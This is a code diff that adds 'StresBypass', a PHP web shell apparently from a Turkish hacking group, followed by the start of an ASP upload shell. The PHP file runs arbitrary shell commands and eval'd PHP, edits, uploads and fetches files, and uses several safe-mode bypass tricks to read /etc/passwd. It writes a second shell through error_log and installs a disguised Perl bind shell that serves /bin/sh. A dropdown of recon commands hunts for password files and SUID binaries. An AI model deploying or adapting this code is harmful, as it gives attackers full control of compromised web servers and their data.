+    <font face=Verdana size=-2 color="#008000"> HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF> </font><font size=-2 face=verdana color=#008000>Mail 
+admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>     </font><font face=Verdana size=-2 color="black">   </font></a></font>
+</font>
+    </b>
+</font></a>  <br>
+
+<font size="4px">
+<b>
+<font size=-2 face=verdana color=white>
+    <font face=Verdana size=-2 color="#CC0000">
+    <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
+    <font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>  </font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
+    </font><font size="1" face="verdana"> </font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
+    </font>
+    </a>
+
+<font size="4px">
+</a>
+<font size=-2 face=verdana color=white>
+
+            
+</font></font>
+    <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+    <font size="4px"><font face=Verdana size=-2 color="black">                
+    </font>
+    <font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
+port
+    </font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
+    </font></font>
+    </font>
+    </font>
+    </b>
+</font></p></td></tr></table>
+<?
+if ($act == "help") {echo "<center><b>?????? ????? ????? ???? ???????<br><br>????? ????????<br>??? ???? ???????? ???? ??? ??? ?????? ?????? ?????? ??????<br>?????? ?? ??????? ??????   </a>.</b>";}
+if ($act == "bindport"){
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Connect\"></form></div>";
+}
+if ($act == "tools"){
+    echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+Dosya Düzenle:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Buradan İndir:</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>-->>:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+}
+if ($act == "about") {echo "<center><b>Coding by:<br><br>By Stres<br>&<br><br>-----<br><br>Biyo Security Team<br><br>Bypass Version:1.0 Beta phpshell code<br>Turkiye</a>.</b>";}
+
+if ($act == "bind") {echo "<center><b>By Stres:<br><br>-Connect ?? ?????? ??? ????.<br>.- ??? ????? ????? ???????? ???????<br>.-???? ????? ???? ??? ????? ???<br>nc -lp 3333?????? ?????? - <br>???????? ???? ?????? <br>Bind port to  :<br> bind shell ?????? ? ??   </a>.</b>";}
+
+if ($act == "command") {echo "<center><b>By Stres:<br><br>??????? ??????? ???????  Select ------ x  ???? ??? ??????<br>.- ???? ???? ?????  ??????? ????? ?? ????? ???????<br>Command   </a>.</b>";}
+
+if ($act == "team") {echo "<center><b>By Stres<br><br>BiyoSecurityTeam<br><br> </a>.</b>";}
+if (array_key_exists('image', $_GET)) {
+    header('Content-Type: image/gif');
+    die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Uygula:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
+<INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<select name=plugin><option>cat /etc/passwd</option></select>
+<INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
+<INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
+}
+if ($act == "decoder"){
+echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
+</textarea><br>
+<INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
+}
+if ($act == "SQL"){
+echo ("<FONT COLOR=\"RED\">   MySQL    </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td> Username :
+<INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
+password :
+<INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
+<input type=submit value='Enter'>\n
+<input type=reset value='Clear'></td></tr></table></form></div>";
+}
+?>
+
+
+
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
+    <td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
+    <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+    <TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
+    <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+    <td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
+     </p>
+    <p align="center"> <table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+        <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+            <td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
+<?php
+// chr() //
+if(empty($_POST['Mohajer22'])){
+} else {
+$m=$_POST['Mohajer22'];
+$m=str_replace(" ","",$m);
+$m=str_replace("(","",$m);
+$m=str_replace(")","",$m);
+$m=str_replace(".",";",$m);
+$m=str_replace("chr","&#",$m);
+$m=str_replace(" ","",$m);
+echo $m ;
+}
+// ERORR //
+if(empty($_POST['ERORR'])){
+} else {
+$ERORR=$_POST['ERORR'];
+echo  error_log("
+<html>
+<head>
+<title> Exploit: error_log() By * StresBypass  * </title>
+<body bgcolor=\"#000000\">
+<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
+<tr>
+<td><center><font size='6' color='#BBB516'> By  * StresBypass * BiyoSecurityTeam</font></center></td>
+</tr>
+</table>
+<font color='#FF0000'>
+</head>
+<?
+if(\$fileup == \"\"){
+ECHO \" reade for up \";
+}else{
+\$path= exec(\"pwd\");
+\$path .= \"/\$fileup_name\";
+\$CopyFile = copy(\$fileup,\"\$path\");
+if(\$CopyFile){
+echo \" up ok \";
+}else{
+echo \" no up \";
+}
+}
+if(empty(\$_POST['m'])){
+} else {
+\$m=\$_POST['m'];
+echo  system(\$m);
+}
+if(empty(\$_POST['cmd'])){
+} else {
+\$h=  \$_POST['cmd'];
+print include(\$h) ;
+   }
+
+
+?>
+<form method='POST' enctype='multipart/form-data' action='stresbypass.php'>
+<input type='file' name='fileup' size='20'>
+<input type='submit' value='  up  '>
+</form>
+<form method='POST'  action='stresbypass.php'>
+<input type='cmd' name='cmd' size='20'>
+<input type='submit' value='  open (shill.txt) '>
+</form>
+<form method='POST' enctype='multipart/form-data' action='stresbypass.php'>
+<input type='text' name='m' size='20'>
+<input type='submit' value='  run  '>
+<input type='reset' value=' reset '>
+</form>
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "<br>";
+                                                }
+                                        }
+
+                                break;
+
+
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "<pre>".$str."</pre>";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "<pre>";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."<p> </p>" ;
+echo "</pre>";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+    accept(X, S);
+    unless(fork)
+    {
+        open STDIN, \"<&X\";
+        open STDOUT, \">&X\";
+        open STDERR, \">&X\";
+        close X;
+        exec(\"/bin/sh\");
+    }
+    close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+if (!empty($com))
+{
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "<" , $string);
+$string = str_replace(">" , ">" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>saved -OK!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Emred:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
+
+
+Rehber:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"..Exec..\"></form>";
+
+
+
+
+
+if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
+Including from here: "
+. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
+
+
+
+
+?> </td></tr></table></p></td></tr></table></a><br><hr size="1" noshade><b></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
+    <b>
+    :: </b>
+    <font face=Verdana size=-2><a href="?act=command">Uygulama Emreder</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
+    <?
+    echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
+?>
+        <input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
+     </p>
+    </td>
+    <td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
+    <form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
+        <font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
+        -----------------------------------------------------------</option>
+        <option value="ls -la /var/lib/mysq">ls MySQL</option>
+        <option value="which curl">cURL ?</option>
+        <option value="which wget">Wget ?</option>
+        <option value="which lynx">Lynx ?</option>
+        <option value="which links">links ?</option>
+        <option value="which fetch">fetch ?</option>
+        <option value="which GET">GET ?</option>
+        <option value="which per">Perl ?</option>
+        <option value="gcc --help">C gcc Help ?</option>
+        <option value="tar --help">tar Help ?</option>
+        <option value="cat /etc/passwd">Get passwd !!!</option>
+        <option value="cat /etc/hosts">Get hosts</option>
+        <option value="perl --help">Perl Help ?</option>
+        <option value="find / -type f -perm -04000 -ls">
+        find all suid files</option><option value="find . -type f -perm -04000 -ls">
+        find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
+        find all sgid files</option><option value="find . -type f -perm -02000 -ls">
+        find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
+        find config.inc.php files</option><option value="find / -type f -name "config*"">
+        find config* files</option><option value="find . -type f -name "config*"">
+        find config* files in current dir</option><option value="find / -perm -2 -ls">
+        find all writable directories and files</option><option value="find . -perm -2 -ls">
+        find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
+        find all service.pwd files</option><option value="find . -type f -name service.pwd">
+        find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
+        find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
+        find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
+        find all .bash_history files</option><option value="find . -type f -name .bash_history">
+        find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
+        find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
+        find .fetchmailrc files in current dir</option><option value="lsattr -va">
+        list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
+        show opened ports</option></select><input type="hidden" name="cmd_txt" value="1"> <input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">?</font></a><font color="#00FF00"><br>
+</font>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+<td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
+    <p align="center">
+<a bookmark="minipanel">
+    <b><font face="verdana" color="red" size="4">
+    <a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
+    <font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
+    file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">"</font></p><p align="center">
+     <?
+if ($act == "edit") {echo "<center><b>??????? ????????:<br><br> ?? ???? ??? ????? ???? ???? ?????? ???<br>???? ???? ????? ??? config.php ????<br>Edit<br>????? ?? ????? ??? ??????? ????? <br>????? ? ??? ???? ????? ??? ??? ?? ???? ?? ???????? <br>???? ???? ???? ?????? washer-stres.txt   </a>.</b>";}
+?>
+    </p>
+    <p> </p>
+    <p>    <?
+    echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+Dosya Düzenle:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+?>
+    </p>
+    </form></center></p></td>
+<td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+                 <?
+if ($act == "upload") {echo "<center><b>??? ???????:<br><br>?? ?????? ????? ?????? ???? <br>???? ???? ?? ?????? ??? ?????? ??????<br>UPLOAD< </a>.</b>";}
+?><a bookmark="minipanel"><b><font size="2">::
+    </font>
+    </b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
+                    upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>N</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload"> 
+        <?
+        echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<INPUT type=\"file\" name=\"userfile\">
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Download\"></form></div>";
+?>
+    <p></form></p></td>
+
+</tr>
+</table>    </a><p><br></p><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+    <b>
+     </b><font face="Wingdings 3" size="5">y</font><b>StresBypass<span lang="en-us">v1.0</span> <span lang="en-us">pro</span>  </b><font color="#CC0000"><b>©oded by</b> </font><b><span lang="en-us"><a href="http://www.biyosecurity.com">BiyoSecurity.Com</a></span> |<span lang="en-us">By Stres</span> </b><font face="Wingdings 3" size="5">x</font></p><p align="center"> </p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us"> </span></div></body></html>
diff --git a/php/toolaspshell.php b/php/toolaspshell.php
new file mode 100644
index 0000000..4d82c85
--- /dev/null
+++ b/php/toolaspshell.php
@@ -0,0 +1,792 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%
+On Error Resume Next
+Server.ScriptTimeOut  = 7200
+Class FileUploader
+	Public  Files
+	Private mcolFormElem
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
